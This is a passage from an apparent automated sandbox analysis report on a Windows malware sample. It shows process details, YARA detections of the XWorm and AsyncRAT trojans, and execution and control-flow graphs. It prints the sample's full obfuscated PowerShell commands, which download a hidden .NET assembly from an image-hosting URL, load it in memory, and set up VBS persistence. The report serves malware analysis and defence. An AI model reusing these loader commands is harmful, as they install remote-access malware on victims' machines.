gTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreZQBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:07:53:23
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:07:53:24
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:07:53:32
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:07:53:32
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:07:53:35
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                                                                                        Imagebase:0x9a0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:9
                                                                                        Start time:07:53:41
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
                                                                                        Imagebase:0x7ff6f7700000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:07:53:49
                                                                                        Start date:23/04/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
                                                                                        Imagebase:0x7ff6f7700000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2978134498.00007FF848940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848940000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848940000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: b76bdf0bb305de07b93fe68ced3bdc5ee4f21927d670612f70f8ebd59447f3df
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: DE01A77011CB0C4FDB44EF0CE051AA6B7E0FB85364F10052DE58AC3651D736E882CB45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2364538759.00007FF848960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff848960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction ID: 388c77c6672c763649cca843f2d23f611de3eca2c3b5ecdb788c6c390b3e9ce9
                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction Fuzzy Hash: CF01A73010CB0C4FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3651DB36E882CB45
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:2.6%
                                                                                          Total number of Nodes:154
                                                                                          Total number of Limit Nodes:11
                                                                                          execution_graph 25055 1061ca0 25056 1061ce4 SetWindowsHookExW 25055->25056 25058 1061d2a 25056->25058 25059 10671a0 DuplicateHandle 25060 1067236 25059->25060 25061 f5d0fc 25062 f5d114 25061->25062 25063 f5d16e 25062->25063 25068 51b314a 25062->25068 25073 51b23d7 25062->25073 25078 51b3158 25062->25078 25083 51b23e8 25062->25083 25069 51b3185 25068->25069 25070 51b31b7 25069->25070 25088 51b36e8 25069->25088 25093 51b36c8 25069->25093 25074 51b23e8 25073->25074 25076 51b314a 2 API calls 25074->25076 25077 51b3158 2 API calls 25074->25077 25075 51b242f 25075->25063 25076->25075 25077->25075 25079 51b3185 25078->25079 25080 51b31b7 25079->25080 25081 51b36c8 2 API calls 25079->25081 25082 51b36e8 2 API calls 25079->25082 25081->25080 25082->25080 25084 51b240e 25083->25084 25086 51b314a 2 API calls 25084->25086 25087 51b3158 2 API calls 25084->25087 25085 51b242f 25085->25063 25086->25085 25087->25085 25090 51b36fc 25088->25090 25089 51b3788 25089->25070 25098 51b378f 25090->25098 25102 51b37a0 25090->25102 25095 51b36e8 25093->25095 25094 51b3788 25094->25070 25096 51b378f 2 API calls 25095->25096 25097 51b37a0 2 API calls 25095->25097 25096->25094 25097->25094 25099 51b37a0 25098->25099 25100 51b37b1 25099->25100 25105 51b4960 25099->25105 25100->25089 25103 51b37b1 25102->25103 25104 51b4960 2 API calls 25102->25104 25103->25089 25104->25103 25109 51b4990 25105->25109 25113 51b4980 25105->25113 25106 51b497a 25106->25100 25110 51b49d9 25109->25110 25111 51b49d2 25109->25111 25110->25106 25111->25110 25112 51b4a2a CallWindowProcW 25111->25112 25112->25110 25114 51b4990 25113->25114 25115 51b4a2a CallWindowProcW 25114->25115 25116 51b49d9 25114->25116 25115->25116 25116->25106 25117 10677b8 25118 10677e6 25117->25118 25121 1066d1c 25118->25121 25120 1067806 25120->25120 25124 1066d27 25121->25124 25122 1068457 25122->25120 25123 10683fc 25123->25122 25139 51b70f0 25123->25139 25143 51b70e0 25123->25143 25124->25122 25124->25123 25129 106a120 25124->25129 25134 106a188 25124->25134 25130 106a123 25129->25130 25130->25123 25131 106a12b 25130->25131 25147 106a327 25130->25147 25151 106a338 25130->25151 25131->25123 25135 106a173 25134->25135 25135->25123 25135->25134 25136 106a1cd 25135->25136 25137 106a327 6 API calls 25135->25137 25138 106a338 6 API calls 25135->25138 25136->25123 25137->25136 25138->25136 25141 51b7155 25139->25141 25140 51b60c0 PeekMessageW 25140->25141 25141->25140 25142 51b71a2 25141->25142 25142->25122 25146 51b70f0 25143->25146 25144 51b60c0 PeekMessageW 25144->25146 25145 51b71a2 25145->25122 25146->25144 25146->25145 25148 106a32b 25147->25148 25149 106a37e 25148->25149 25155 1068064 25148->25155 25149->25131 25152 106a342 25151->25152 25153 106a37e 25152->25153 25154 1068064 6 API calls 25152->25154 25153->25131 25154->25153 25157 106806f 25155->25157 25156 106a3f0 25157->25156 25159 1068098 25157->25159 25160 10680a3 25159->25160 25165 10680a8 25160->25165 25162 106a45f 25169 106fbe8 25162->25169 25163 106a499 25163->25156 25168 10680b3 25165->25168 25166 106b9e0 25166->25162 25167 106a188 6 API calls 25167->25166 25168->25166 25168->25167 25171 106fc19 25169->25171 25173 106fd19 25169->25173 25170 106fc25 25170->25163 25171->25170 25177 106fe60 25171->25177 25172 106fc65 25181 51b1310 25172->25181 25186 51b1300 25172->25186 25173->25163 25191 51b0040 25177->25191 25202 51b0006 25177->25202 25178 106fe6a 25178->25172 25182 51b133b 25181->25182 25183 51b13ea 25182->25183 25231 51b21d0 25182->25231 25236 51b21e0 25182->25236 25187 51b1310 25186->25187 25188 51b13ea 25187->25188 25189 51b21d0 2 API calls 25187->25189 25190 51b21e0 2 API calls 25187->25190 25189->25188 25190->25188 25192 51b0051 25191->25192 25194 51b0074 25191->25194 25200 51b0040 3 API calls 25192->25200 25201 51b0006 3 API calls 25192->25201 25193 51b005c 25193->25194 25213 51b02d8 25193->25213 25218 51b02c8 25193->25218 25194->25178 25195 51b006c 25195->25194 25196 51b0278 GetModuleHandleW 25195->25196 25197 51b02a5 25196->25197 25197->25178 25200->25193 25201->25193 25203 51b0051 25202->25203 25205 51b0074 25202->25205 25211 51b0040 3 API calls 25203->25211 25212 51b0006 3 API calls 25203->25212 25204 51b005c 25204->25205 25209 51b02d8 2 API calls 25204->25209 25210 51b02c8 2 API calls 25204->25210 25205->25178 25206 51b006c 25206->25205 25207 51b0278 GetModuleHandleW 25206->25207 25208 51b02a5 25207->25208 25208->25178 25209->25206 25210->25206 25211->25204 25212->25204 25215 51b02ec 25213->25215 25214 51b0311 25214->25195 25215->25214 25223 51b04b8 25215->25223 25227 51b04b1 25215->25227 25219 51b02ec 25218->25219 25220 51b0311 25219->25220 25221 51b04b8 LoadLibraryExW 25219->25221 25222 51b04b1 LoadLibraryExW 25219->25222 25220->25195 25221->25220 25222->25220 25224 51b04fa 25223->25224 25225 51b0500 LoadLibraryExW 25223->25225 25224->25225 25226 51b0531 25225->25226 25226->25214 25228 51b04fa 25227->25228 25229 51b0500 LoadLibraryExW 25227->25229 25228->25229 25230 51b0531 25229->25230 25230->25214 25232 51b21e0 25231->25232 25240 51b2230 25232->25240 25244 51b2226 25232->25244 25238 51b2230 CreateWindowExW 25236->25238 25239 51b2226 CreateWindowExW 25236->25239 25237 51b2215 25237->25183 25238->25237 25239->25237 25241 51b2298 CreateWindowExW 25240->25241 25243 51b2354 25241->25243 25245 51b2298 CreateWindowExW 25244->25245 25247 51b2354 25245->25247

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 51bc1c8-51bc1fe 124 51bc200 call 51bc1c8 0->124 125 51bc200 call 51bbba0 0->125 1 51bc206-51bc20c 2 51bc20e-51bc212 1->2 3 51bc25c-51bc260 1->3 4 51bc221-51bc228 2->4 5 51bc214-51bc219 2->5 6 51bc262-51bc271 3->6 7 51bc277-51bc28b 3->7 8 51bc2fe-51bc33b 4->8 9 51bc22e-51bc235 4->9 5->4 10 51bc29d-51bc2a7 6->10 11 51bc273-51bc275 6->11 12 51bc293-51bc29a 7->12 21 51bc33d-51bc343 8->21 22 51bc346-51bc366 8->22 9->3 15 51bc237-51bc23b 9->15 13 51bc2a9-51bc2af 10->13 14 51bc2b1-51bc2b5 10->14 11->12 17 51bc2bd-51bc2f7 13->17 14->17 18 51bc2b7 14->18 19 51bc24a-51bc251 15->19 20 51bc23d-51bc242 15->20 17->8 18->17 19->8 23 51bc257-51bc25a 19->23 20->19 21->22 28 51bc368 22->28 29 51bc36d-51bc374 22->29 23->12 31 51bc6fc-51bc705 28->31 32 51bc376-51bc381 29->32 33 51bc70d-51bc71b 32->33 34 51bc387-51bc39a 32->34 39 51bc39c-51bc3aa 34->39 40 51bc3b0-51bc3cb 34->40 39->40 43 51bc684-51bc68b 39->43 44 51bc3ef-51bc3f2 40->44 45 51bc3cd-51bc3d3 40->45 43->31 48 51bc68d-51bc68f 43->48 49 51bc3f8-51bc3fb 44->49 50 51bc54c-51bc552 44->50 46 51bc3dc-51bc3df 45->46 47 51bc3d5 45->47 52 51bc412-51bc418 46->52 53 51bc3e1-51bc3e4 46->53 47->46 47->50 51 51bc63e-51bc641 47->51 47->52 54 51bc69e-51bc6a4 48->54 55 51bc691-51bc696 48->55 49->50 57 51bc401-51bc407 49->57 50->51 56 51bc558-51bc55d 50->56 58 51bc708 51->58 59 51bc647-51bc64d 51->59 60 51bc41a-51bc41c 52->60 61 51bc41e-51bc420 52->61 62 51bc3ea 53->62 63 51bc47e-51bc484 53->63 54->33 64 51bc6a6-51bc6ab 54->64 55->54 56->51 57->50 65 51bc40d 57->65 58->33 67 51bc64f-51bc657 59->67 68 51bc672-51bc676 59->68 69 51bc42a-51bc433 60->69 61->69 62->51 63->51 66 51bc48a-51bc490 63->66 70 51bc6ad-51bc6b2 64->70 71 51bc6f0-51bc6f3 64->71 65->51 72 51bc492-51bc494 66->72 73 51bc496-51bc498 66->73 67->33 74 51bc65d-51bc66c 67->74 68->43 77 51bc678-51bc67e 68->77 75 51bc446-51bc46e 69->75 76 51bc435-51bc440 69->76 70->58 79 51bc6b4 70->79 71->58 78 51bc6f5-51bc6fa 71->78 81 51bc4a2-51bc4b9 72->81 73->81 74->40 74->68 99 51bc562-51bc598 75->99 100 51bc474-51bc479 75->100 76->51 76->75 77->32 77->43 78->31 78->48 80 51bc6bb-51bc6c0 79->80 82 51bc6e2-51bc6e4 80->82 83 51bc6c2-51bc6c4 80->83 92 51bc4bb-51bc4d4 81->92 93 51bc4e4-51bc50b 81->93 82->58 90 51bc6e6-51bc6e9 82->90 87 51bc6d3-51bc6d9 83->87 88 51bc6c6-51bc6cb 83->88 87->33 91 51bc6db-51bc6e0 87->91 88->87 90->71 91->82 95 51bc6b6-51bc6b9 91->95 92->99 105 51bc4da-51bc4df 92->105 93->58 104 51bc511-51bc514 93->104 95->58 95->80 106 51bc59a-51bc59e 99->106 107 51bc5a5-51bc5ad 99->107 100->99 104->58 108 51bc51a-51bc543 104->108 105->99 109 51bc5bd-51bc5c1 106->109 110 51bc5a0-51bc5a3 106->110 107->58 111 51bc5b3-51bc5b8 107->111 108->99 123 51bc545-51bc54a 108->123 112 51bc5c3-51bc5c9 109->112 113 51bc5e0-51bc5e4 109->113 110->107 110->109 111->51 112->113 115 51bc5cb-51bc5d3 112->115 116 51bc5ee-51bc60a 113->116 117 51bc5e6-51bc5ec 113->117 115->58 118 51bc5d9-51bc5de 115->118 120 51bc613-51bc617 116->120 117->116 117->120 118->51 120->51 121 51bc619-51bc635 120->121 121->51 123->99 124->1 125->1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (oeq$(oeq$,iq$,iq
                                                                                          • API String ID: 0-2093320806
                                                                                          • Opcode ID: 0f5224ff8800820bc7bbb8feb7ccdb4327c13dccf316a6dfc5a9e7c951d9def5
                                                                                          • Instruction ID: 673208ca2818ce75a4bade4f8816ec1e363b9b91dd4cb867d6c41bd16f8e4ba5
                                                                                          • Opcode Fuzzy Hash: 0f5224ff8800820bc7bbb8feb7ccdb4327c13dccf316a6dfc5a9e7c951d9def5
                                                                                          • Instruction Fuzzy Hash: 99022C74A0410ADFEB14DFA9C988AEEBBB2FF88304F558065E815EB261D774DD41CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (oeq$Hiq
                                                                                          • API String ID: 0-1760408109
                                                                                          • Opcode ID: 579c48672e8324c35fc34b35c7a75316c57be02831579dec5cdd4eb610b2513f
                                                                                          • Instruction ID: 5872a6effc87bf3f0d576988ad2f6c804590150b460345f9d39106febe83c987
                                                                                          • Opcode Fuzzy Hash: 579c48672e8324c35fc34b35c7a75316c57be02831579dec5cdd4eb610b2513f
                                                                                          • Instruction Fuzzy Hash: BA128E70A042199FEB14DF69C854BAEBBF6FF88304F108569E906EB391DB749D41CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 594 1060eb8-1060ec3 595 1060ec5-1060ece 594->595 596 1060e7d-1060e7e 594->596 597 1060ed5-1060ee5 595->597 598 1060ed0 595->598 599 1060e7f-1060e92 596->599 600 1060e0b-1060e70 596->600 605 1061144-1061152 597->605 606 1060eeb-1060ef9 597->606 601 106115d-1061164 598->601 679 1060e78 600->679 611 1061165-10611de 605->611 613 1061154-1061158 call 10601f8 605->613 606->611 612 1060eff 606->612 612->611 614 1060f06-1060f18 612->614 615 1061002-106102a 612->615 616 1060f43-1060f65 612->616 617 106102f-1061057 612->617 618 1060f6a-1060f8b 612->618 619 10610c9-10610f5 612->619 620 1060fb6-1060fd7 612->620 621 10610f7-1061112 call 10601e8 612->621 622 1061114-1061136 612->622 623 1060f90-1060fb1 612->623 624 106109e-10610c4 612->624 625 1060fdc-1060ffd 612->625 626 106105c-1061099 612->626 627 1060f1d-1060f3e 612->627 628 1061138-1061142 612->628 613->601 614->601 615->601 616->601 617->601 618->601 619->601 620->601 621->601 622->601 623->601 624->601 625->601 626->601 627->601 628->601 679->599
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Xiq$Ij
                                                                                          • API String ID: 0-2230350374
                                                                                          • Opcode ID: e0198e0561d68cc9ffb502ace945366381709230542176b9e9ed6e68c794f1be
                                                                                          • Instruction ID: 67217c543c86fbf253089a92bb945e0d48016141c061d6d5be6628907c40e92e
                                                                                          • Opcode Fuzzy Hash: e0198e0561d68cc9ffb502ace945366381709230542176b9e9ed6e68c794f1be
                                                                                          • Instruction Fuzzy Hash: 87B19E74B00218DBDB08DB789C5477EBBB7BFC8740B148869E456EB399DE349C029791
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 766 51bde90-51bdea3 767 51bdea9-51bdeb2 766->767 768 51bdfe2-51bdfe9 766->768 769 51bdeb8-51bdebc 767->769 770 51bdfec 767->770 771 51bdebe 769->771 772 51bded6-51bdedd 769->772 775 51bdff1-51bdff9 770->775 773 51bdec1-51bdecc 771->773 772->768 774 51bdee3-51bdef0 772->774 773->770 776 51bded2-51bded4 773->776 774->768 781 51bdef6-51bdf09 774->781 779 51bdffb-51be014 775->779 780 51bdf9f-51bdfb3 775->780 776->772 776->773 782 51be01d-51be02d 779->782 783 51be016-51be018 779->783 798 51bdfd8-51bdfdb 780->798 799 51bdfb5-51bdfbb 780->799 784 51bdf0b 781->784 785 51bdf0e-51bdf16 781->785 794 51be41c-51be49a 782->794 795 51be033-51be041 782->795 787 51be410-51be416 783->787 784->785 788 51bdf18-51bdf1e 785->788 789 51bdf83-51bdf85 785->789 788->789 792 51bdf20-51bdf26 788->792 789->768 791 51bdf87-51bdf8d 789->791 791->768 796 51bdf8f-51bdf99 791->796 792->775 797 51bdf2c-51bdf44 792->797 795->794 806 51be047 795->806 796->775 800 51bdf9b 796->800 825 51bdf71-51bdf74 797->825 826 51bdf46-51bdf4c 797->826 798->770 804 51bdfdd-51bdfe0 798->804 799->775 802 51bdfbd-51bdfd1 799->802 800->780 802->775 845 51bdfd3 802->845 804->768 804->796 806->794 810 51be33b-51be34b 806->810 811 51be11a-51be12a 806->811 812 51be158-51be168 806->812 813 51be09e-51be0ae 806->813 814 51be0dc-51be0ec 806->814 815 51be1d3-51be1e3 806->815 816 51be2f3-51be2f9 806->816 817 51be196-51be1a6 806->817 818 51be395-51be3a5 806->818 819 51be294-51be2a4 806->819 820 51be04e-51be05e 806->820 821 51be226-51be236 806->821 822 51be3e6-51be3ec 806->822 837 51be34d-51be353 810->837 838 51be376-51be393 810->838 827 51be149-51be153 811->827 828 51be12c-51be132 811->828 833 51be16a-51be170 812->833 834 51be187-51be191 812->834 839 51be0cd-51be0d7 813->839 840 51be0b0-51be0b6 813->840 848 51be10b-51be115 814->848 849 51be0ee-51be0f4 814->849 850 51be20c-51be21b 815->850 851 51be1e5-51be1eb 815->851 823 51be2fb 816->823 824 51be2fd 816->824 841 51be1a8-51be1ae 817->841 842 51be1c4-51be1ce 817->842 846 51be3cd-51be3e4 818->846 847 51be3a7-51be3ad 818->847 843 51be2a6-51be2ac 819->843 844 51be2d4-51be2e0 819->844 835 51be060-51be066 820->835 836 51be085-51be099 820->836 829 51be238-51be23e 821->829 830 51be26e-51be27a 821->830 831 51be3ee 822->831 832 51be3f0 822->832 852 51be2ff-51be301 823->852 824->852 825->770 856 51bdf76-51bdf79 825->856 826->775 853 51bdf52-51bdf66 826->853 827->787 854 51be140-51be144 828->854 855 51be134-51be136 828->855 867 51be24c-51be251 829->867 868 51be240-51be242 829->868 907 51be27c-51be27e 830->907 908 51be286-51be289 830->908 869 51be3f2-51be3f6 831->869 832->869 857 51be17e-51be182 833->857 858 51be172-51be174 833->858 834->787 870 51be068-51be06a 835->870 871 51be074-51be080 835->871 836->787 859 51be361-51be371 837->859 860 51be355-51be357 837->860 838->787 839->787 872 51be0b8-51be0ba 840->872 873 51be0c4-51be0c8 840->873 861 51be1bc-51be1bf 841->861 862 51be1b0-51be1b2 841->862 842->787 874 51be2ba-51be2bf 843->874 875 51be2ae-51be2b0 843->875 887 51be417 844->887 911 51be2e6-51be2e8 844->911 845->798 846->787 863 51be3bb-51be3cb 847->863 864 51be3af-51be3b1 847->864 848->787 877 51be102-51be106 849->877 878 51be0f6-51be0f8 849->878 850->887 903 51be221 850->903 865 51be1f9-51be201 851->865 866 51be1ed-51be1ef 851->866 880 51be303-51be30d 852->880 881 51be312-51be336 852->881 853->775 913 51bdf6c 853->913 854->787 855->854 856->770 883 51bdf7b-51bdf81 856->883 857->787 858->857 859->787 860->859 861->787 862->861 863->787 864->863 865->887 888 51be207 865->888 866->865 893 51be25f-51be263 867->893 894 51be253-51be257 867->894 868->867 891 51be3f8-51be3fd call 51b8080 869->891 892 51be3ff-51be40b call 51b8080 869->892 870->871 871->787 872->873 873->787 874->887 897 51be2c5-51be2c9 874->897 875->874 877->787 878->877 880->787 881->787 883->788 883->789 887->794 888->787 891->787 892->787 893->887 906 51be269 893->906 894->887 905 51be25d 894->905 897->887 909 51be2cf 897->909 903->787 905->906 906->787 907->887 919 51be284 907->919 908->887 920 51be28f 908->920 909->787 911->887 921 51be2ee 911->921 913->825 919->920 920->787 921->787
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Xiq
                                                                                          • API String ID: 0-3761363452
                                                                                          • Opcode ID: 786378219232dc52c31f6c7421a39ef8dd5b936a374dc3fd32ba45ec33cc4d3e
                                                                                          • Instruction ID: 82896566ad6ecc62af9eb6dccdd8773c21b61028938ccb5f74ce390cad037cbd
                                                                                          • Opcode Fuzzy Hash: 786378219232dc52c31f6c7421a39ef8dd5b936a374dc3fd32ba45ec33cc4d3e
                                                                                          • Instruction Fuzzy Hash: 83F1A630704215CBEF289F2AC454AFA7BAABF84701F198A6DD853D7294CBB4DC41C792
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
